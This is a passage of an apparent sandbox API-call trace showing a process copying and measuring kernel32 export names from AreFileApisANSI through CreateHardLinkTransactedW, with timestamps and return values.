returned="AreFileApisANSI" [0181.552] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0181.552] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0181.552] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0181.552] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0181.552] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0181.552] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0181.552] lstrlenA (lpString="BACKUPREAD") returned 10 [0181.552] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0181.552] lstrlenA (lpString="BACKUPSEEK") returned 10 [0181.552] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0181.552] lstrlenA (lpString="BACKUPWRITE") returned 11 [0181.552] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0181.552] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0181.552] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0181.552] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0181.552] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0181.552] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0181.552] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0181.552] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0181.552] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0181.552] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0181.552] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0181.552] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0181.552] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0181.552] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0181.552] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0181.552] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0181.553] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0181.553] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0181.553] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0181.553] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0181.553] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0181.553] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0181.553] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0181.553] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0181.553] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0181.553] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0181.553] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0181.553] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0181.553] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0181.553] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0181.553] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0181.553] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0181.553] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0181.553] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0181.553] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0181.553] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0181.553] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0181.553] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0181.553] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0181.553] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0181.553] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0181.553] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0181.553] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0181.553] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0181.553] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0181.553] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0181.553] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0181.553] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0181.553] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0181.553] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0181.554] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0181.554] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0181.554] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0181.554] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0181.554] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0181.554] lstrlenA (lpString="BEEP") returned 4 [0181.554] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0181.554] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0181.554] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0181.554] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0181.554] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0181.554] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0181.554] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0181.554] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0181.554] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0181.554] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0181.554] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0181.554] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0181.554] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0181.554] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0181.554] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0181.554] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0181.554] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0181.554] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0181.554] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0181.554] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0181.554] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0181.554] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0181.554] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0181.554] lstrlenA (lpString="CANCELIO") returned 8 [0181.554] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0181.554] lstrlenA (lpString="CANCELIOEX") returned 10 [0181.554] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0181.554] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0181.554] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0181.555] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0181.555] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0181.555] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0181.555] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0181.555] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0181.555] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0181.555] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0181.555] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0181.555] lstrlenA (lpString="CHECKELEVATION") returned 14 [0181.555] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0181.555] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0181.555] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0181.555] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0181.555] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0181.555] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0181.555] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0181.555] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0181.555] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0181.555] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0181.555] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0181.555] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0181.555] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0181.555] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0181.555] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0181.555] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0181.555] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0181.555] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0181.555] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0181.555] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0181.555] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0181.555] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0181.555] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0181.555] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0181.555] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0181.556] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0181.556] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0181.556] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0181.556] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0181.556] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0181.556] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0181.556] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0181.556] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0181.556] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0181.556] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0181.556] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0181.556] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0181.556] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0181.556] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0181.556] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0181.556] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0181.556] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0181.556] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0181.556] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0181.556] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0181.556] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0181.556] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0181.556] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0181.556] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0181.556] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0181.556] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0181.556] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0181.556] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0181.556] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0181.556] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0181.556] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0181.556] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0181.556] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0181.556] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0181.556] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0181.557] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0181.557] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0181.557] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0181.557] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0181.557] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0181.557] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0181.557] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0181.557] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0181.557] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0181.557] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0181.557] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0181.557] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0181.557] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0181.557] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0181.557] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0181.557] lstrlenA (lpString="COPYCONTEXT") returned 11 [0181.557] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0181.557] lstrlenA (lpString="COPYFILEA") returned 9 [0181.557] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0181.557] lstrlenA (lpString="COPYFILEEXA") returned 11 [0181.557] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0181.557] lstrlenA (lpString="COPYFILEEXW") returned 11 [0181.557] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0181.557] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0181.557] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0181.557] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0181.557] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0181.557] lstrlenA (lpString="COPYFILEW") returned 9 [0181.557] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0181.557] lstrlenA (lpString="COPYLZFILE") returned 10 [0181.557] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0181.557] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0181.557] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0181.557] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0181.558] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0181.558] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0181.558] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0181.558] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0181.558] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0181.558] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0181.558] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0181.558] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0181.558] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0181.558] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0181.558] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0181.558] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0181.558] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0181.558] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0181.558] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0181.558] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0181.558] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0181.558] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0181.558] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0181.558] lstrlenA (lpString="CREATEEVENTA") returned 12 [0181.558] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0181.558] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0181.558] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0181.558] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0181.558] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0181.558] lstrlenA (lpString="CREATEEVENTW") returned 12 [0181.558] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0181.558] lstrlenA (lpString="CREATEFIBER") returned 11 [0181.558] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0181.558] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0181.558] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0181.558] lstrlenA (lpString="CREATEFILEA") returned 11 [0181.558] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0181.558] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0181.558] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0181.558] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0181.559] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0181.559] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0181.559] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0181.559] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0181.559] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0181.559] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0181.559] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0181.559] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0181.559] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0181.559] lstrlenA (lpString="CREATEFILEW") returned 11 [0181.559] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0181.559] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0181.559] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0181.559] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0181.559] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") 